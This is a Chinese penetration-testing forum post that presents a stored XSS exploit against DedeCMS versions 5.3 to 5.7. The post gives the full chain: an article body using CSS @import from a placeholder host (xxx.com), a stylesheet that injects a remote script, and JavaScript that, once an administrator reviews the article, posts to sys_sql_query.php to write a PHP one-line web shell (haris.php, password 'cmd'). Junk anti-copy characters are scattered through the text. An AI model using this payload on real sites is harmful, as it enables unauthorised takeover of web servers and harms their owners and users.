找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms xss oday通杀所有版本 可getshell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1741|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell
' m1 Q& r( O  b; Y: l- ]* |为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)) y; I# F1 W7 j" C
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
" t* h3 Z) G! t0 s下面说说利用方法。
: p: e' p; D+ @) c8 J' t% y条件有2个:- j9 o; U/ }1 F
1.开启注册+ M5 h2 t& K1 h' c. n, G  ]
2.开启投稿9 o  O+ _# o) e) h' U% h, S
注册会员----发表文章) B) r# O7 h  B& V, U7 i. h
内容填写:
& E# `5 o& s/ N+ l9 n) E复制代码$ W" ]' Z* N( K: Q6 c. I6 o0 g
<style>@im\port'\http://xxx.com/xss.css';</style>
/ _. F6 Y+ u- Y% @9 c9 V9 S2 M* V( N新建XSS.Css- o; \: C( J1 `: X
复制代码& t) c, p. V+ [: m" [3 k
.body{6 z+ n& e. h: R; M( \# ~
background-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }3 l' |- I: o& ^) v+ O
新建xss.js 内容为2 \1 S* {" {$ c. G
复制代码/ S9 r: z5 p1 [' @
1.var request = false;+ A& J# Y% Q" o3 Y8 N7 _0 Q* q; w# P
2.if(window.XMLHttpRequest) {, A" A+ Y5 s, y4 q( R# D
3.request = new XMLHttpRequest();# |+ F: G, u) o$ J( o
4.if(request.overrideMimeType) {, h7 T1 a1 [8 a7 j  T" j: l; V
5.request.overrideMimeType('text/xml');; \, N/ G) b8 a& [$ @: M8 a
6.}
4 Y7 i9 W3 Z, S- h* d3 c% s( M7.} else if(window.ActiveXObject) {/ p4 p5 d4 L5 {0 |8 _# T
8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];+ u- s" g; w0 p+ Q, I
9.for(var i=0; i<versions.length; i++) {9 Z& M1 A1 q/ R( Q) y
10.try {! ]: c: E# ^/ R6 i
11.request = new ActiveXObject(versions);3 y9 U* z1 ]8 F: t* |
12.} catch(e) {}' U8 y/ r- h# X( B
13.}
! F& X  v( U* D2 `( O& O14.}
* Y- q& o9 u: X, h! }# U+ L6 |15.xmlhttp=request;
7 b7 @$ v. x+ V3 K16.function getFolder( url ){! W* V; D. L$ ]( A, A' ~
17. obj = url.split('/')1 P+ I2 t" x( R; |8 y( Y$ q
18. return obj[obj.length-2]
( B& i: u4 q' y' q19.}
4 T& a+ h  _9 I( `! Q20.oUrl = top.location.href;
- A3 Z" a" m7 f1 g) Z; T21.u = getFolder(oUrl);4 S. e" P7 M% M# K1 c; B
22.add_admin();
: N$ X4 X% b4 R8 a23.function add_admin(){
, W& F2 E- X3 s/ i) g' C7 V. ]24.var url= "/"+u+"/sys_sql_query.php";
( V- V2 }) H5 w7 _# ]6 w. B25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";1 D: B9 q' m: A7 @! C: c
26.xmlhttp.open("POST", url, true);
: i+ {: q$ B9 U: O" a* p; r27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
! `: v) i2 O. [* Q' R28.xmlhttp.setRequestHeader("Content-length", params.length);
- c3 z6 S1 M4 C% V5 h/ i9 V6 u29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");. H9 b  }$ L' X/ R
30.xmlhttp.send(params);
# I1 A( @* \: W( i5 r; Y* l31.}
7 K" J" a# N2 o) N4 G4 G0 z当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表